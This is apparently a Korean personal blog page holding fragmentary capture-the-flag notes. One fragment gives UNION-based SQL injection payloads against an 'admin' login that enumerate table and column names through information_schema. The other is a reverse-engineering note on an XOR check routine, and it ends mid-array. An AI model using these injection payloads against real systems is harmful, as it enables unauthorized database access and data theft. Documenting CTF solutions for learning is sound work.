mAlfred's House mAlfred's House

union 접근 컬럼 갯수 확인 DB명 파악 admin' union select '1',table_name, '3', '4' from information_schema.tables # 컬럼 이름 파악 admin' union select '1', '2', '3', column_name from information_schema.columns where table_name='gasdasdqW#!@$!@#@!' #

대충 보면 call chall3.7ff613011000을 호출하고 je로 맞는지 아닌지를 출력하는 것을 볼 수 있다. 그렇다면 당연하게도 저 부분이 체크 루틴이라는 것을 추측할 수 있었다. 해당 체크 루틴의 함수로 들어가면 해당 문자열을 가져오고 cmp rax, 18을 하는 것을 볼 수 있다. for문이라는 것을 알 수 있다. 00007FF613013000 을 가져오고 입력한 내용과 xor 연산을 for문으로 받은 숫자 값을 하고. i * 2를 한 값을 비교하는 것을 볼 수 있어씀 num = [0x49, 0x60, 0x67, 0x74, 0x63, 0x67, 0x42, 0x66, 0x80 , 0x78 , 0x69 , 0x69 , 0x7B , 0x99 , 0x6D , 0x88,0x68, 0x94, 0x9F,..